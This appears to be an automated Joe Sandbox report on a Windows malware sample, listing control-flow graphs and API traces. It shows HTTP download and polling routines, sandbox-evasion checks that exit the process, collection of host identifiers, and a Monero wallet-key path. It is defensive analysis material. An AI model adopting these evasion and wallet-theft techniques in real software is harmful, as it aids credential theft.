                                control_flow_graph 1033 b76280-b7630b call b8a7a0 call b747b0 call b8a740 InternetOpenA StrCmpCA 1040 b76314-b76318 1033->1040 1041 b7630d 1033->1041 1042 b7631e-b76342 InternetConnectA 1040->1042 1043 b76509-b76525 call b8a7a0 call b8a800 * 2 1040->1043 1041->1040 1045 b764ff-b76503 InternetCloseHandle 1042->1045 1046 b76348-b7634c 1042->1046 1062 b76528-b7652d 1043->1062 1045->1043 1048 b7634e-b76358 1046->1048 1049 b7635a 1046->1049 1051 b76364-b76392 HttpOpenRequestA 1048->1051 1049->1051 1053 b764f5-b764f9 InternetCloseHandle 1051->1053 1054 b76398-b7639c 1051->1054 1053->1045 1056 b763c5-b76405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 b7639e-b763bf InternetSetOptionA 1054->1057 1059 b76407-b76427 call b8a740 call b8a800 * 2 1056->1059 1060 b7642c-b7644b call b88940 1056->1060 1057->1056 1059->1062 1067 b7644d-b76454 1060->1067 1068 b764c9-b764e9 call b8a740 call b8a800 * 2 1060->1068 1071 b764c7-b764ef InternetCloseHandle 1067->1071 1072 b76456-b76480 InternetReadFile 1067->1072 1068->1062 1071->1053 1076 b76482-b76489 1072->1076 1077 b7648b 1072->1077 1076->1077 1080 b7648d-b764c5 call b8a9b0 call b8a8a0 call b8a800 1076->1080 1077->1071 1080->1072
                                APIs
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B74839
                                  • Part of subcall function 00B747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B74849
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • InternetOpenA.WININET(00B90DFE,00000001,00000000,00000000,00000000), ref: 00B762E1
                                • StrCmpCA.SHLWAPI(?,0093E310), ref: 00B76303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B76335
                                • HttpOpenRequestA.WININET(00000000,GET,?,0093D8A8,00000000,00000000,00400100,00000000), ref: 00B76385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B763BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B763D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00B763FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B7646D
                                • InternetCloseHandle.WININET(00000000), ref: 00B764EF
                                • InternetCloseHandle.WININET(00000000), ref: 00B764F9
                                • InternetCloseHandle.WININET(00000000), ref: 00B76503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: f44786b8634a3a805eafa892ff8737fd38991fd47d1601e5515a19f845274a36
                                • Instruction ID: fa4a2ca19d5fd3038758ee11dbf1d298013b5fdbca7dfa28c92a4399ccd3013b
                                • Opcode Fuzzy Hash: f44786b8634a3a805eafa892ff8737fd38991fd47d1601e5515a19f845274a36
                                • Instruction Fuzzy Hash: 00711E75A00218EBEB14EBA4DC45BEE77B8FB44700F108199F509AB290DBB46E85CF51
                                Function 00B85510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1090 b85510-b85577 call b85ad0 call b8a820 * 3 call b8a740 * 4 1106 b8557c-b85583 1090->1106 1107 b85585-b855b6 call b8a820 call b8a7a0 call b71590 call b851f0 1106->1107 1108 b855d7-b8564c call b8a740 * 2 call b71590 call b852c0 call b8a8a0 call b8a800 call b8aad0 StrCmpCA 1106->1108 1124 b855bb-b855d2 call b8a8a0 call b8a800 1107->1124 1134 b85693-b856a9 call b8aad0 StrCmpCA 1108->1134 1138 b8564e-b8568e call b8a7a0 call b71590 call b851f0 call b8a8a0 call b8a800 1108->1138 1124->1134 1139 b857dc-b85844 call b8a8a0 call b8a820 * 2 call b71670 call b8a800 * 4 call b86560 call b71550 1134->1139 1140 b856af-b856b6 1134->1140 1138->1134 1270 b85ac3-b85ac6 1139->1270 1143 b857da-b8585f call b8aad0 StrCmpCA 1140->1143 1144 b856bc-b856c3 1140->1144 1163 b85991-b859f9 call b8a8a0 call b8a820 * 2 call b71670 call b8a800 * 4 call b86560 call b71550 1143->1163 1164 b85865-b8586c 1143->1164 1149 b8571e-b85793 call b8a740 * 2 call b71590 call b852c0 call b8a8a0 call b8a800 call b8aad0 StrCmpCA 1144->1149 1150 b856c5-b85719 call b8a820 call b8a7a0 call b71590 call b851f0 call b8a8a0 call b8a800 1144->1150 1149->1143 1250 b85795-b857d5 call b8a7a0 call b71590 call b851f0 call b8a8a0 call b8a800 1149->1250 1150->1143 1163->1270 1171 b8598f-b85a14 call b8aad0 StrCmpCA 1164->1171 1172 b85872-b85879 1164->1172 1201 b85a28-b85a91 call b8a8a0 call b8a820 * 2 call b71670 call b8a800 * 4 call b86560 call b71550 1171->1201 1202 b85a16-b85a21 Sleep 1171->1202 1179 b8587b-b858ce call b8a820 call b8a7a0 call b71590 call b851f0 call b8a8a0 call b8a800 1172->1179 1180 b858d3-b85948 call b8a740 * 2 call b71590 call b852c0 call b8a8a0 call b8a800 call b8aad0 StrCmpCA 1172->1180 1179->1171 1180->1171 1275 b8594a-b8598a call b8a7a0 call b71590 call b851f0 call b8a8a0 call b8a800 1180->1275 1201->1270 1202->1106 1250->1143 1275->1171
                                APIs
                                  • Part of subcall function 00B8A820: lstrlen.KERNEL32(00B74F05,?,?,00B74F05,00B90DDE), ref: 00B8A82B
                                  • Part of subcall function 00B8A820: lstrcpy.KERNEL32(00B90DDE,00000000), ref: 00B8A885
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B85644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B856A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B85857
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B851F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B85228
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B852C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B85318
                                  • Part of subcall function 00B852C0: lstrlen.KERNEL32(00000000), ref: 00B8532F
                                  • Part of subcall function 00B852C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00B85364
                                  • Part of subcall function 00B852C0: lstrlen.KERNEL32(00000000), ref: 00B85383
                                  • Part of subcall function 00B852C0: lstrlen.KERNEL32(00000000), ref: 00B853AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B8578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B85940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B85A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00B85A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: d8c0c2dbc48314842802607c70c19f911e2630f46790f73a05fe9d43a8f06daf
                                • Instruction ID: 0d0e51fd5d19bee07798278db43698cc9dd2561d5d395712f497a57ab45d137c
                                • Opcode Fuzzy Hash: d8c0c2dbc48314842802607c70c19f911e2630f46790f73a05fe9d43a8f06daf
                                • Instruction Fuzzy Hash: FBE11275910204DADB18FBA4DC969ED73B8AF54300F5085A9B506A61B1EF386F09CBB2
                                Function 00B817A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1301 b817a0-b817cd call b8aad0 StrCmpCA 1304 b817cf-b817d1 ExitProcess 1301->1304 1305 b817d7-b817f1 call b8aad0 1301->1305 1309 b817f4-b817f8 1305->1309 1310 b817fe-b81811 1309->1310 1311 b819c2-b819cd call b8a800 1309->1311 1313 b8199e-b819bd 1310->1313 1314 b81817-b8181a 1310->1314 1313->1309 1316 b8185d-b8186e StrCmpCA 1314->1316 1317 b8187f-b81890 StrCmpCA 1314->1317 1318 b81970-b81981 StrCmpCA 1314->1318 1319 b818f1-b81902 StrCmpCA 1314->1319 1320 b81951-b81962 StrCmpCA 1314->1320 1321 b81932-b81943 StrCmpCA 1314->1321 1322 b81913-b81924 StrCmpCA 1314->1322 1323 b81835-b81844 call b8a820 1314->1323 1324 b81849-b81858 call b8a820 1314->1324 1325 b818ad-b818be StrCmpCA 1314->1325 1326 b818cf-b818e0 StrCmpCA 1314->1326 1327 b8198f-b81999 call b8a820 1314->1327 1328 b81821-b81830 call b8a820 1314->1328 1330 b8187a 1316->1330 1331 b81870-b81873 1316->1331 1332 b8189e-b818a1 1317->1332 1333 b81892-b8189c 1317->1333 1347 b8198d 1318->1347 1348 b81983-b81986 1318->1348 1338 b8190e 1319->1338 1339 b81904-b81907 1319->1339 1344 b8196e 1320->1344 1345 b81964-b81967 1320->1345 1342 b8194f 1321->1342 1343 b81945-b81948 1321->1343 1340 b81930 1322->1340 1341 b81926-b81929 1322->1341 1323->1313 1324->1313 1334 b818ca 1325->1334 1335 b818c0-b818c3 1325->1335 1336 b818ec 1326->1336 1337 b818e2-b818e5 1326->1337 1327->1313 1328->1313 1330->1313 1331->1330 1352 b818a8 1332->1352 1333->1352 1334->1313 1335->1334 1336->1313 1337->1336 1338->1313 1339->1338 1340->1313 1341->1340 1342->1313 1343->1342 1344->1313 1345->1344 1347->1313 1348->1347 1352->1313
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00B817C5
                                • ExitProcess.KERNEL32 ref: 00B817D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 878d194eec5d19c281550136fa30255900a69de4e8c6ea94e0c927618116849e
                                • Instruction ID: b0cfd0af3123a7e1c80c6ca40045db28803a7b7e1c3da9f76d9d53b2fae62963
                                • Opcode Fuzzy Hash: 878d194eec5d19c281550136fa30255900a69de4e8c6ea94e0c927618116849e
                                • Instruction Fuzzy Hash: 46515CB4A11209EFDB04EFA8D994ABE77F9BF44304F104499E806A7360D770E952CB62
                                Function 00B87500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1356 b87500-b8754a GetWindowsDirectoryA 1357 b8754c 1356->1357 1358 b87553-b875c7 GetVolumeInformationA call b88d00 * 3 1356->1358 1357->1358 1365 b875d8-b875df 1358->1365 1366 b875fc-b87617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 b875e1-b875fa call b88d00 1365->1367 1369 b87628-b87658 wsprintfA call b8a740 1366->1369 1370 b87619-b87626 call b8a740 1366->1370 1367->1365 1377 b8767e-b8768e 1369->1377 1370->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00B87542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B8757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B87603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B8760A
                                • wsprintfA.USER32 ref: 00B87640
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\
                                • API String ID: 1544550907-3809124531
                                • Opcode ID: a799bbc932a83722768f665f9870b031f8b3598b1030c3d144eae0183f8f3dc9
                                • Instruction ID: 2badba9054af26c58c4c6a5b57660e45a8d956f945407b84bfc0842852c6f1d6
                                • Opcode Fuzzy Hash: a799bbc932a83722768f665f9870b031f8b3598b1030c3d144eae0183f8f3dc9
                                • Instruction Fuzzy Hash: 2B4183B1D44348EBDB10EF98DC85BDEBBB8EF18704F100199F509A7290DB74AA44CBA5
                                Function 00B869F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,009306D8), ref: 00B898A1
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,009306A8), ref: 00B898BA
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,009306C0), ref: 00B898D2
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,009306F0), ref: 00B898EA
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,009307B0), ref: 00B89903
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,00938890), ref: 00B8991B
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,00926600), ref: 00B89933
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,009264C0), ref: 00B8994C
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,00930558), ref: 00B89964
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,00930708), ref: 00B8997C
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,00930840), ref: 00B89995
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,00930720), ref: 00B899AD
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,009262E0), ref: 00B899C5
                                  • Part of subcall function 00B89860: GetProcAddress.KERNEL32(75550000,00930768), ref: 00B899DE
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B711D0: ExitProcess.KERNEL32 ref: 00B71211
                                  • Part of subcall function 00B71160: GetSystemInfo.KERNEL32(?), ref: 00B7116A
                                  • Part of subcall function 00B71160: ExitProcess.KERNEL32 ref: 00B7117E
                                  • Part of subcall function 00B71110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B7112B
                                  • Part of subcall function 00B71110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00B71132
                                  • Part of subcall function 00B71110: ExitProcess.KERNEL32 ref: 00B71143
                                  • Part of subcall function 00B71220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B7123E
                                  • Part of subcall function 00B71220: __aulldiv.LIBCMT ref: 00B71258
                                  • Part of subcall function 00B71220: __aulldiv.LIBCMT ref: 00B71266
                                  • Part of subcall function 00B71220: ExitProcess.KERNEL32 ref: 00B71294
                                  • Part of subcall function 00B86770: GetUserDefaultLangID.KERNEL32 ref: 00B86774
                                  • Part of subcall function 00B71190: ExitProcess.KERNEL32 ref: 00B711C6
                                  • Part of subcall function 00B87850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B711B7), ref: 00B87880
                                  • Part of subcall function 00B87850: RtlAllocateHeap.NTDLL(00000000), ref: 00B87887
                                  • Part of subcall function 00B87850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B8789F
                                  • Part of subcall function 00B878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B87910
                                  • Part of subcall function 00B878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00B87917
                                  • Part of subcall function 00B878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B8792F
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009388A0,?,00B9110C,?,00000000,?,00B91110,?,00000000,00B90AEF), ref: 00B86ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B86AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00B86AF9
                                • Sleep.KERNEL32(00001770), ref: 00B86B04
                                • CloseHandle.KERNEL32(?,00000000,?,009388A0,?,00B9110C,?,00000000,?,00B91110,?,00000000,00B90AEF), ref: 00B86B1A
                                • ExitProcess.KERNEL32 ref: 00B86B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0
                                • Opcode ID: a78f98fd82dc01352f0771400092bcfeb16bccf0bf99f4a8bbb0c8464c860f8b
                                • Instruction ID: e0e2a80e02bdc9a69c2a32f13a7385e158ebf9c6661ebbefaca1a65ca614d0ed
                                • Opcode Fuzzy Hash: a78f98fd82dc01352f0771400092bcfeb16bccf0bf99f4a8bbb0c8464c860f8b
                                • Instruction Fuzzy Hash: CC310B71904219AAEB04FBF4DC56BEE77F8AF04340F5045A9F212B61A2DF746A05C7B2
                                Function 00B71220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1436 b71220-b71247 call b889b0 GlobalMemoryStatusEx 1439 b71273-b7127a 1436->1439 1440 b71249-b71271 call b8da00 * 2 1436->1440 1442 b71281-b71285 1439->1442 1440->1442 1444 b71287 1442->1444 1445 b7129a-b7129d 1442->1445 1447 b71292-b71294 ExitProcess 1444->1447 1448 b71289-b71290 1444->1448 1448->1445 1448->1447
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B7123E
                                • __aulldiv.LIBCMT ref: 00B71258
                                • __aulldiv.LIBCMT ref: 00B71266
                                • ExitProcess.KERNEL32 ref: 00B71294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: d9d7a19ccbee129aea6b880ec43d06483a16acc566f1d9ae1def86a96b02ccec
                                • Instruction ID: 66706002c5ca8c24ec4fd36284e28e6f94d1df466db6107a7c5755b19762e500
                                • Opcode Fuzzy Hash: d9d7a19ccbee129aea6b880ec43d06483a16acc566f1d9ae1def86a96b02ccec
                                • Instruction Fuzzy Hash: D2014FB0D44308FADB10EFD8CC49B9DB7B8AB04701F208589E709B62D1D67455418BA9
                                Function 00B86AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                Download Yara Rule

